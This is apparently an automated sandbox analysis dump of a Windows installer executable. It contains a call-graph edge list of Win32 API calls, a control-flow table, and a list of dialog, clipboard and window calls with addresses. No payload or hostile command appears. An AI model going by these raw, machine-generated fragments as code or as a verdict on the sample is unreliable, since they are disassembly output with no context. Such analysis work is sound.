3725 405e8c GetTickCount GetTempFileNameW 3724->3725 3726 405ec2 3725->3726 3727 4037fe 3725->3727 3726->3725 3726->3727 3727->3475 3728->3556 3729->3558 3731 406760 3730->3731 3732 4035f3 3731->3732 3733 406766 CharPrevW 3731->3733 3734 406009 lstrcpynW 3732->3734 3733->3731 3733->3732 3734->3562 3736 403357 3735->3736 3736->3576 3738 4032f3 3737->3738 3739 4032db 3737->3739 3742 403303 GetTickCount 3738->3742 3743 4032fb 3738->3743 3740 4032e4 DestroyWindow 3739->3740 3741 4032eb 3739->3741 3740->3741 3741->3565 3745 403311 CreateDialogParamW ShowWindow 3742->3745 3746 403334 3742->3746 3772 406332 3743->3772 3745->3746 3746->3565 3748->3571 3751 403398 3749->3751 3750 4033c3 3753 403336 ReadFile 3750->3753 3751->3750 3794 403368 SetFilePointer 3751->3794 3754 4033ce 3753->3754 3755 4033e7 GetTickCount 3754->3755 3756 403518 3754->3756 3758 4033d2 3754->3758 3768 4033fa 3755->3768 3757 40351c 3756->3757 3762 403540 3756->3762 3759 403336 ReadFile 3757->3759 3758->3580 3759->3758 3760 403336 ReadFile 3760->3762 3761 403336 ReadFile 3761->3768 3762->3758 3762->3760 3763 40355f WriteFile 3762->3763 3763->3758 3764 403574 3763->3764 3764->3758 3764->3762 3766 40345c GetTickCount 3766->3768 3767 403485 MulDiv wsprintfW 3783 404f72 3767->3783 3768->3758 3768->3761 3768->3766 3768->3767 3770 4034c9 WriteFile 3768->3770 3776 407312 3768->3776 3770->3758 3770->3768 3771->3572 3773 40634f PeekMessageW 3772->3773 3774 406345 DispatchMessageW 3773->3774 3775 403301 3773->3775 3774->3773 3775->3565 3777 407332 3776->3777 3778 40733a 3776->3778 3777->3768 3778->3777 3779 4073c2 GlobalFree 3778->3779 3780 4073cb GlobalAlloc 3778->3780 3781 407443 GlobalAlloc 3778->3781 3782 40743a GlobalFree 3778->3782 3779->3780 3780->3777 3780->3778 3781->3777 3781->3778 3782->3781 3784 404f8b 3783->3784 3793 40502f 3783->3793 3785 404fa9 lstrlenW 3784->3785 3786 406805 18 API calls 3784->3786 3787 404fd2 3785->3787 3788 404fb7 lstrlenW 3785->3788 3786->3785 3790 404fe5 3787->3790 3791 404fd8 SetWindowTextW 3787->3791 3789 404fc9 lstrcatW 3788->3789 3788->3793 3789->3787 3792 404feb SendMessageW SendMessageW SendMessageW 3790->3792 3790->3793 3791->3790 3792->3793 3793->3768 3794->3750 3796 403ea9 3795->3796 3824 405f51 wsprintfW 3796->3824 3798 403f1d 3799 406805 18 API calls 3798->3799 3800 403f29 SetWindowTextW 3799->3800 3802 403f44 3800->3802 3801 403f5f 3801->3595 3802->3801 3803 406805 18 API calls 3802->3803 3803->3802 3825 403daf 3804->3825 3806 40506a 3809 4062a3 11 API calls 3806->3809 3811 405095 3806->3811 3828 40139d 3806->3828 3807 403daf SendMessageW 3808 4050a5 OleUninitialize 3807->3808 3808->3632 3809->3806 3811->3807 3812->3592 3814 405f07 RegQueryValueExW 3813->3814 3815 405989 3813->3815 3816 405f29 RegCloseKey 3814->3816 3815->3590 3815->3591 3816->3815 3818->3597 3963 406009 lstrcpynW 3819->3963 3821 403e88 3822 406722 3 API calls 3821->3822 3823 403e8e lstrcatW 3822->3823 3823->3615 3824->3798 3826 403dc7 3825->3826 3827 403db8 SendMessageW 3825->3827 3826->3806 3827->3826 3831 4013a4 3828->3831 3829 401410 3829->3806 3831->3829 3832 4013dd MulDiv SendMessageW 3831->3832 3833 4015a0 3831->3833 3832->3831 3834 4015fa 3833->3834 3913 40160c 3833->3913 3835 401601 3834->3835 3836 401742 3834->3836 3837 401962 3834->3837 3838 4019ca 3834->3838 3839 40176e 3834->3839 3840 401650 3834->3840 3841 4017b1 3834->3841 3842 401672 3834->3842 3843 401693 3834->3843 3844 401616 3834->3844 3845 4016d6 3834->3845 3846 401736 3834->3846 3847 401897 3834->3847 3848 4018db 3834->3848 3849 40163c 3834->3849 3850 4016bd 3834->3850 3834->3913 3863 4062a3 11 API calls 3835->3863 3855 401751 ShowWindow 3836->3855 3856 401758 3836->3856 3860 40145c 18 API calls 3837->3860 3853 40145c 18 API calls 3838->3853 3857 40145c 18 API calls 3839->3857 3880 4062a3 11 API calls 3840->3880 3946 40145c 3841->3946 3858 40145c 18 API calls 3842->3858 3940 401446 3843->3940 3852 40145c 18 API calls 3844->3852 3869 401446 18 API calls 3845->3869 3845->3913 3846->3913 3962 405f51 wsprintfW 3846->3962 3859 40145c 18 API calls 3847->3859 3864 40145c 18 API calls 3848->3864 3854 401647 PostQuitMessage 3849->3854 3849->3913 3851 4062a3 11 API calls 3850->3851 3866 4016c7 SetForegroundWindow 3851->3866 3867 40161c 3852->3867 3868 4019d1 SearchPathW 3853->3868 3854->3913 3855->3856 3870 401765 ShowWindow 3856->3870 3856->3913 3871 401775 3857->3871 3872 401678 3858->3872 3873 40189d 3859->3873 3874 401968 GetFullPathNameW 3860->3874 3863->3913 3865 4018e2 3864->3865 3877 40145c 18 API calls 3865->3877 3866->3913 3878 4062a3 11 API calls 3867->3878 3868->3913 3869->3913 3870->3913 3881 4062a3 11 API calls 3871->3881 3882 4062a3 11 API calls 3872->3882 3958 4062d5 FindFirstFileW 3873->3958 3884 40197f 3874->3884 3926 4019a1 3874->3926 3876 40169a 3943 4062a3 lstrlenW wvsprintfW 3876->3943 3887 4018eb 3877->3887 3888 401627 3878->3888 3889 401664 3880->3889 3890 401785 SetFileAttributesW 3881->3890 3891 401683 3882->3891 3908 4062d5 2 API calls 3884->3908 3884->3926 3885 4062a3 11 API calls 3893 4017c9 3885->3893 3896 40145c 18 API calls 3887->3896 3897 404f72 25 API calls 3888->3897 3898 40139d 65 API calls 3889->3898 3899 40179a 3890->3899 3890->3913 3906 404f72 25 API calls 3891->3906 3951 405d59 CharNextW CharNextW 3893->3951 3895 4019b8 GetShortPathNameW 3895->3913 3904 4018f5 3896->3904 3897->3913 3898->3913 3905 4062a3 11 API calls 3899->3905 3900 4018c2 3909 4062a3 11 API calls 3900->3909 3901 4018a9 3907 4062a3 11 API calls 3901->3907 3911 4062a3 11 API calls 3904->3911 3905->3913 3906->3913 3907->3913 3912 401991 3908->3912 3909->3913 3910 4017d4 3914 401864 3910->3914 3917 405d06 CharNextW 3910->3917 3935 4062a3 11 API calls 3910->3935 3915 401902 MoveFileW 3911->3915 3912->3926 3961 406009 lstrcpynW 3912->3961 3913->3831 3914->3891 3916 40186e 3914->3916 3918 401912 3915->3918 3919 40191e 3915->3919 3920 404f72 25 API calls 3916->3920 3922 4017e6 CreateDirectoryW 3917->3922 3918->3891 3924 401942 3919->3924 3929 4062d5 2 API calls 3919->3929 3925 401875 3920->3925 3922->3910 3923 4017fe GetLastError 3922->3923 3927 401827 GetFileAttributesW 3923->3927 3928 40180b GetLastError 3923->3928 3934 4062a3 11 API calls 3924->3934 3957 406009 lstrcpynW 3925->3957 3926->3895 3926->3913 3927->3910 3931 4062a3 11 API calls 3928->3931 3932 401929 3929->3932 3931->3910 3932->3924 3937 406c68 42 API calls 3932->3937 3933 401882 SetCurrentDirectoryW 3933->3913 3936 40195c 3934->3936 3935->3910 3936->3913 3938 401936 3937->3938 3939 404f72 25 API calls 3938->3939 3939->3924 3941 406805 18 API calls 3940->3941 3942 401455 3941->3942 3942->3876 3944 4060e7 9 API calls 3943->3944 3945 4016a7 Sleep 3944->3945 3945->3913 3947 406805 18 API calls 3946->3947 3948 401488 3947->3948 3949 401497 3948->3949 3950 406038 5 API calls 3948->3950 3949->3885 3950->3949 3952 405d76 3951->3952 3953 405d88 3951->3953 3952->3953 3954 405d83 CharNextW 3952->3954 3955 405dac 3953->3955 3956 405d06 CharNextW 3953->3956 3954->3955 3955->3910 3956->3953 3957->3933 3959 4018a5 3958->3959 3960 4062eb FindClose 3958->3960 3959->3900 3959->3901 3960->3959 3961->3926 3962->3913 3963->3821 3965 403c91 3964->3965 3966 403876 3965->3966 3967 403c96 FreeLibrary GlobalFree 3965->3967 3968 406c9b 3966->3968 3967->3966 3967->3967 3969 40677e 18 API calls 3968->3969 3970 406cae 3969->3970 3971 406cb7 DeleteFileW 3970->3971 3972 406cce 3970->3972 4012 403882 CoUninitialize 3971->4012 3973 406e4b 3972->3973 4016 406009 lstrcpynW 3972->4016 3979 4062d5 2 API calls 3973->3979 4001 406e58 3973->4001 3973->4012 3975 406cf9 3976 406d03 lstrcatW 3975->3976 3977 406d0d 3975->3977 3978 406d13 3976->3978 3980 406751 2 API calls 3977->3980 3982 406d23 lstrcatW 3978->3982 3983 406d19 3978->3983 3981 406e64 3979->3981 3980->3978 3986 406722 3 API calls 3981->3986 3981->4012 3985 406d2b lstrlenW FindFirstFileW 3982->3985 3983->3982 3983->3985 3984 4062a3 11 API calls 3984->4012 3987 406e3b 3985->3987 3991 406d52 3985->3991 3988 406e6e 3986->3988 3987->3973 3990 4062a3 11 API calls 3988->3990 3989 405d06 CharNextW 3989->3991 3992 406e79 3990->3992 3991->3989 3995 406e18 FindNextFileW 3991->3995 4004 406c9b 72 API calls 3991->4004 4011 404f72 25 API calls 3991->4011 4013 4062a3 11 API calls 3991->4013 4014 404f72 25 API calls 3991->4014 4015 406c68 42 API calls 3991->4015 4017 406009 lstrcpynW 3991->4017 4018 405e30 GetFileAttributesW 3991->4018 3993 405e30 2 API calls 3992->3993 3994 406e81 RemoveDirectoryW 3993->3994 3998 406ec4 3994->3998 3999 406e8d 3994->3999 3995->3991 3997 406e30 FindClose 3995->3997 3997->3987 4000 404f72 25 API calls 3998->4000 3999->4001 4002 406e93 3999->4002 4000->4012 4001->3984 4003 4062a3 11 API calls 4002->4003 4005 406e9d 4003->4005 4004->3991 4007 404f72 25 API calls 4005->4007 4009 406ea7 4007->4009 4010 406c68 42 API calls 4009->4010 4010->4012 4011->3995 4012->3491 4012->3492 4013->3991 4014->3991 4015->3991 4016->3975 4017->3991 4019 405e4d DeleteFileW 4018->4019 4020 405e3f SetFileAttributesW 4018->4020 4019->3991 4020->4019 4021->3653 4022->3677 4023->3698 4024->3698 4025->3685 4027 406ae7 GetShortPathNameW 4026->4027 4028 406abe 4026->4028 4029 406b00 4027->4029 4030 406c62 4027->4030 4052 405e50 GetFileAttributesW CreateFileW 4028->4052 4029->4030 4032 406b08 WideCharToMultiByte 4029->4032 4030->3705 4032->4030 4034 406b25 WideCharToMultiByte 4032->4034 4033 406ac7 CloseHandle GetShortPathNameW 4033->4030 4035 406adf 4033->4035 4034->4030 4036 406b3d wsprintfA 4034->4036 4035->4027 4035->4030 4037 406805 18 API calls 4036->4037 4038 406b69 4037->4038 4053 405e50 GetFileAttributesW CreateFileW 4038->4053 4040 406b76 4040->4030 4041 406b83 GetFileSize GlobalAlloc 4040->4041 4042 406ba4 ReadFile 4041->4042 4043 406c58 CloseHandle 4041->4043 4042->4043 4044 406bbe 4042->4044 4043->4030 4044->4043 4054 405db6 lstrlenA 4044->4054 4047 406bd7 lstrcpyA 4050 406bf9 4047->4050 4048 406beb 4049 405db6 4 API calls 4048->4049 4049->4050 4051 406c30 SetFilePointer WriteFile GlobalFree 4050->4051 4051->4043 4052->4033 4053->4040 4055 405df7 lstrlenA 4054->4055 4056 405dd0 lstrcmpiA 4055->4056 4057 405dff 4055->4057 4056->4057 4058 405dee CharNextA 4056->4058 4057->4047 4057->4048 4058->4055 4939 402a84 4940 401553 19 API calls 4939->4940 4941 402a8e 4940->4941 4942 401446 18 API calls 4941->4942 4943 402a98 4942->4943 4944 401a13 4943->4944 4945 402ab2 RegEnumKeyW 4943->4945 4946 402abe RegEnumValueW 4943->4946 4947 402a7e 4945->4947 4946->4944 4946->4947 4947->4944 4948 4029e4 RegCloseKey 4947->4948 4948->4944 4949 402c8a 4950 402ca2 4949->4950 4951 402c8f 4949->4951 4953 40145c 18 API calls 4950->4953 4952 401446 18 API calls 4951->4952 4955 402c97 4952->4955 4954 402ca9 lstrlenW 4953->4954 4954->4955 4956 402ccb WriteFile 4955->4956 4957 401a13 4955->4957 4956->4957 4958 40400d 4959 40406a 4958->4959 4960 40401a lstrcpynA lstrlenA 4958->4960 4960->4959 4961 40404b 4960->4961 4961->4959 4962 404057 GlobalFree 4961->4962 4962->4959 4963 401d8e 4964 40145c 18 API calls 4963->4964 4965 401d95 ExpandEnvironmentStringsW 4964->4965 4966 401da8 4965->4966 4968 401db9 4965->4968 4967 401dad lstrcmpW 4966->4967 4966->4968 4967->4968 4969 401e0f 4970 401446 18 API calls 4969->4970 4971 401e17 4970->4971 4972 401446 18 API calls 4971->4972 4973 401e21 4972->4973 4974 4030e3 4973->4974 4976 405f51 wsprintfW 4973->4976 4976->4974 4977 402392 4978 40145c 18 API calls 4977->4978 4979 402399 4978->4979 4982 4071f8 4979->4982 4983 406ed2 25 API calls 4982->4983 4984 407218 4983->4984 4985 407222 lstrcpynW lstrcmpW 4984->4985 4986 4023a7 4984->4986 4987 407254 4985->4987 4988 40725a lstrcpynW 4985->4988 4987->4988 4988->4986 4059 402713 4074 406009 lstrcpynW 4059->4074 4061 40272c 4075 406009 lstrcpynW 4061->4075 4063 402738 4064 40145c 18 API calls 4063->4064 4066 402743 4063->4066 4064->4066 4065 402752 4068 40145c 18 API calls 4065->4068 4070 402761 4065->4070 4066->4065 4067 40145c 18 API calls 4066->4067 4067->4065 4068->4070 4069 40145c 18 API calls 4071 40276b 4069->4071 4070->4069 4072 4062a3 11 API calls 4071->4072 4073 40277f WritePrivateProfileStringW 4072->4073 4074->4061 4075->4063 4989 402797 4990 40145c 18 API calls 4989->4990 4991 4027ae 4990->4991 4992 40145c 18 API calls 4991->4992 4993 4027b7 4992->4993 4994 40145c 18 API calls 4993->4994 4995 4027c0 GetPrivateProfileStringW lstrcmpW 4994->4995 4996 402e18 4997 40145c 18 API calls 4996->4997 4998 402e1f FindFirstFileW 4997->4998 4999 402e32 4998->4999 5004 405f51 wsprintfW 4999->5004 5001 402e43 5005 406009 lstrcpynW 5001->5005 5003 402e50 5004->5001 5005->5003 5006 401e9a 5007 40145c 18 API calls 5006->5007 5008 401ea1 5007->5008 5009 401446 18 API calls 5008->5009 5010 401eab wsprintfW 5009->5010 4286 401a1f 4287 40145c 18 API calls 4286->4287 4288 401a26 4287->4288 4289 4062a3 11 API calls 4288->4289 4290 401a49 4289->4290 4291 401a64 4290->4291 4292 401a5c 4290->4292 4340 406009 lstrcpynW 4291->4340 4339 406009 lstrcpynW 4292->4339 4295 401a62 4299 406038 5 API calls 4295->4299 4296 401a6f 4297 406722 3 API calls 4296->4297 4298 401a75 lstrcatW 4297->4298 4298->4295 4301 401a81 4299->4301 4300 4062d5 2 API calls 4300->4301 4301->4300 4302 405e30 2 API calls 4301->4302 4304 401a98 CompareFileTime 4301->4304 4305 401ba9 4301->4305 4309 4062a3 11 API calls 4301->4309 4313 406009 lstrcpynW 4301->4313 4319 406805 18 API calls 4301->4319 4326 405ca0 MessageBoxIndirectW 4301->4326 4330 401b50 4301->4330 4337 401b5d 4301->4337 4338 405e50 GetFileAttributesW CreateFileW 4301->4338 4302->4301 4304->4301 4306 404f72 25 API calls 4305->4306 4308 401bb3 4306->4308 4307 404f72 25 API calls 4310 401b70 4307->4310 4311 40337f 37 API calls 4308->4311 4309->4301 4314 4062a3 11 API calls 4310->4314 4312 401bc6 4311->4312 4315 4062a3 11 API calls 4312->4315 4313->4301 4321 401b8b 4314->4321 4316 401bda 4315->4316 4317 401be9 SetFileTime 4316->4317 4318 401bf8 CloseHandle 4316->4318 4317->4318 4320 401c09 4318->4320 4318->4321 4319->4301 4322 401c21 4320->4322 4323 401c0e 4320->4323 4325 406805 18 API calls 4322->4325 4324 406805 18 API calls 4323->4324 4327 401c16 lstrcatW 4324->4327 4328 401c29 4325->4328 4326->4301 4327->4328 4329 4062a3 11 API calls 4328->4329 4331 401c34 4329->4331 4332 401b93 4330->4332 4333 401b53 4330->4333 4334 405ca0 MessageBoxIndirectW 4331->4334 4335 4062a3 11 API calls 4332->4335 4336 4062a3 11 API calls 4333->4336 4334->4321 4335->4321 4336->4337 4337->4307 4338->4301 4339->4295 4340->4296 5011 40209f GetDlgItem GetClientRect 5012 40145c 18 API calls 5011->5012 5013 4020cf LoadImageW SendMessageW 5012->5013 5014 4030e3 5013->5014 5015 4020ed DeleteObject 5013->5015 5015->5014 5016 402b9f 5017 401446 18 API calls 5016->5017 5022 402ba7 5017->5022 5018 402c4a 5019 402bdf ReadFile 5021 402c3d 5019->5021 5019->5022 5020 401446 18 API calls 5020->5021 5021->5018 5021->5020 5028 402d17 ReadFile 5021->5028 5022->5018 5022->5019 5022->5021 5023 402c06 MultiByteToWideChar 5022->5023 5024 402c3f 5022->5024 5026 402c4f 5022->5026 5023->5022 5023->5026 5029 405f51 wsprintfW 5024->5029 5026->5021 5027 402c6b SetFilePointer 5026->5027 5027->5021 5028->5021 5029->5018 5030 402b23 GlobalAlloc 5031 402b39 5030->5031 5032 402b4b 5030->5032 5033 401446 18 API calls 5031->5033 5034 40145c 18 API calls 5032->5034 5035 402b41 5033->5035 5036 402b52 WideCharToMultiByte lstrlenA 5034->5036 5037 402b93 5035->5037 5038 402b84 WriteFile 5035->5038 5036->5035 5038->5037 5039 402384 GlobalFree 5038->5039 5039->5037 5041 4044a5 5042 404512 5041->5042 5043 4044df 5041->5043 5045 40451f GetDlgItem GetAsyncKeyState 5042->5045 5052 4045b1 5042->5052 5109 405c84 GetDlgItemTextW 5043->5109 5048 40453e GetDlgItem 5045->5048 5055 40455c 5045->5055 5046 4044ea 5049 406038 5 API calls 5046->5049 5047 40469d 5107 404833 5047->5107 5111 405c84 GetDlgItemTextW 5047->5111 5050 403d3f 19 API calls 5048->5050 5051 4044f0 5049->5051 5054 404551 ShowWindow 5050->5054 5057 403e74 5 API calls 5051->5057 5052->5047 5058 406805 18 API calls 5052->5058 5052->5107 5054->5055 5060 404579 SetWindowTextW 5055->5060 5065 405d59 4 API calls 5055->5065 5056 403dca 8 API calls 5061 404847 5056->5061 5062 4044f5 GetDlgItem 5057->5062 5063 40462f SHBrowseForFolderW 5058->5063 5059 4046c9 5064 40677e 18 API calls 5059->5064 5066 403d3f 19 API calls 5060->5066 5067 404503 IsDlgButtonChecked 5062->5067 5062->5107 5063->5047 5068 404647 CoTaskMemFree 5063->5068 5069 4046cf 5064->5069 5070 40456f 5065->5070 5071 404597 5066->5071 5067->5042 5072 406722 3 API calls 5068->5072 5112 406009 lstrcpynW 5069->5112 5070->5060 5076 406722 3 API calls 5070->5076 5073 403d3f 19 API calls 5071->5073 5074 404654 5072->5074 5077 4045a2 5073->5077 5078 40468b SetDlgItemTextW 5074->5078 5083 406805 18 API calls 5074->5083 5076->5060 5110 403d98 SendMessageW 5077->5110 5078->5047 5079 4046e6 5081 4062fc 3 API calls 5079->5081 5090 4046ee 5081->5090 5082 4045aa 5086 4062fc 3 API calls 5082->5086 5084 404673 lstrcmpiW 5083->5084 5084->5078 5087 404684 lstrcatW 5084->5087 5085 404730 5113 406009 lstrcpynW 5085->5113 5086->5052 5087->5078 5089 404739 5091 405d59 4 API calls 5089->5091 5090->5085 5095 406751 2 API calls 5090->5095 5096 404785 5090->5096 5092 40473f GetDiskFreeSpaceW 5091->5092 5094 404763 MulDiv 5092->5094 5092->5096 5094->5096 5095->5090 5098 4047e2 5096->5098 5099 4043ad 21 API calls 5096->5099 5097 404805 5114 403d85 KiUserCallbackDispatcher 5097->5114 5098->5097 5100 40141d 80 API calls 5098->5100 5101 4047d3 5099->5101 5100->5097 5103 4047e4 SetDlgItemTextW 5101->5103 5104 4047d8 5101->5104 5103->5098 5105 4043ad 21 API calls 5104->5105 5105->5098 5106 404821 5106->5107 5115 403d61 5106->5115 5107->5056 5109->5046 5110->5082 5111->5059 5112->5079 5113->5089 5114->5106 5116 403d74 SendMessageW 5115->5116 5117 403d6f 5115->5117 5116->5107 5117->5116 5118 402da5 5119 4030e3 5118->5119 5120 402dac 5118->5120 5121 401446 18 API calls 5120->5121 5122 402db8 5121->5122 5123 402dbf SetFilePointer 5122->5123 5123->5119 5124 402dcf 5123->5124 5124->5119 5126 405f51 wsprintfW 5124->5126 5126->5119 5127 4030a9 SendMessageW 5128 4030c2 InvalidateRect 5127->5128 5129 4030e3 5127->5129 5128->5129 5130 401cb2 5131 40145c 18 API calls 5130->5131 5132 401c54 5131->5132 5133 4062a3 11 API calls 5132->5133 5136 401c64 5132->5136 5134 401c59 5133->5134 5135 406c9b 81 API calls 5134->5135 5135->5136 4086 4021b5 4087 40145c 18 API calls 4086->4087 4088 4021bb 4087->4088 4089 40145c 18 API calls 4088->4089 4090 4021c4 4089->4090 4091 40145c 18 API calls 4090->4091 4092 4021cd 4091->4092 4093 40145c 18 API calls 4092->4093 4094 4021d6 4093->4094 4095 404f72 25 API calls 4094->4095 4096 4021e2 ShellExecuteW 4095->4096 4097 40221b 4096->4097 4098 40220d 4096->4098 4100 4062a3 11 API calls 4097->4100 4099 4062a3 11 API calls 4098->4099 4099->4097 4101 402230 4100->4101 5144 402238 5145 40145c 18 API calls 5144->5145 5146 40223e 5145->5146 5147 4062a3 11 API calls 5146->5147 5148 40224b 5147->5148 5149 404f72 25 API calls 5148->5149 5150 402255 5149->5150 5151 405c3f 2 API calls 5150->5151 5152 40225b 5151->5152 5153 4062a3 11 API calls 5152->5153 5156 4022ac CloseHandle 5152->5156 5159 40226d 5153->5159 5155 4030e3 5156->5155 5157 402283 WaitForSingleObject 5158 402291 GetExitCodeProcess 5157->5158 5157->5159 5158->5156 5161 4022a3 5158->5161 5159->5156 5159->5157 5160 406332 2 API calls 5159->5160 5160->5157 5163 405f51 wsprintfW 5161->5163 5163->5156 5164 4040b8 5165 4040d3 5164->5165 5173 404201 5164->5173 5169 40410e 5165->5169 5195 403fca WideCharToMultiByte 5165->5195 5166 40426c 5167 404276 GetDlgItem 5166->5167 5168 40433e 5166->5168 5170 404290 5167->5170 5171 4042ff 5167->5171 5174 403dca 8 API calls 5168->5174 5176 403d3f 19 API calls 5169->5176 5170->5171 5179 4042b6 6 API calls 5170->5179 5171->5168 5180 404311 5171->5180 5173->5166 5173->5168 5175 40423b GetDlgItem SendMessageW 5173->5175 5178 404339 5174->5178 5200 403d85 KiUserCallbackDispatcher 5175->5200 5177 40414e 5176->5177 5182 403d3f 19 API calls 5177->5182 5179->5171 5183 404327 5180->5183 5184 404317 SendMessageW 5180->5184 5187 40415b CheckDlgButton 5182->5187 5183->5178 5188 40432d SendMessageW 5183->5188 5184->5183 5185 404267 5186 403d61 SendMessageW 5185->5186 5186->5166 5198 403d85 KiUserCallbackDispatcher 5187->5198 5188->5178 5190 404179 GetDlgItem 5199 403d98 SendMessageW 5190->5199 5192 40418f SendMessageW 5193 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5192->5193 5194 4041ac GetSysColor 5192->5194 5193->5178 5194->5193 5196 404007 5195->5196 5197 403fe9 GlobalAlloc WideCharToMultiByte 5195->5197 5196->5169 5197->5196 5198->5190 5199->5192 5200->5185 4195 401eb9 4196 401f24 4195->4196 4197 401ec6 4195->4197 4198 401f53 GlobalAlloc 4196->4198 4199 401f28 4196->4199 4200 401ed5 4197->4200 4207 401ef7 4197->4207 4201 406805 18 API calls 4198->4201 4206 4062a3 11 API calls 4199->4206 4211 401f36 4199->4211 4202 4062a3 11 API calls 4200->4202 4205 401f46 4201->4205 4203 401ee2 4202->4203 4208 402708 4203->4208 4213 406805 18 API calls 4203->4213 4205->4208 4209 402387 GlobalFree 4205->4209 4206->4211 4217 406009 lstrcpynW 4207->4217 4209->4208 4219 406009 lstrcpynW 4211->4219 4212 401f06 4218 406009 lstrcpynW 4212->4218 4213->4203 4215 401f15 4220 406009 lstrcpynW 4215->4220 4217->4212 4218->4215 4219->4205 4220->4208 5201 4074bb 5203 407344 5201->5203 5202 407c6d 5203->5202 5204 4073c2 GlobalFree 5203->5204 5205 4073cb GlobalAlloc 5203->5205 5206 407443 GlobalAlloc 5203->5206 5207 40743a GlobalFree 5203->5207 5204->5205 5205->5202 5205->5203 5206->5202 5206->5203 5207->5206

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                    • GetClientRect.USER32(?,?), ref: 00405196
                                                                    • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                    • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                      • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                    • ShowWindow.USER32(00000000), ref: 004052E7
                                                                    • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                    • ShowWindow.USER32(00000008), ref: 00405333
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                    • CreatePopupMenu.USER32 ref: 00405376
                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                    • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                    • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                    • EmptyClipboard.USER32 ref: 00405411
                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                    • CloseClipboard.USER32 ref: 0040546E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
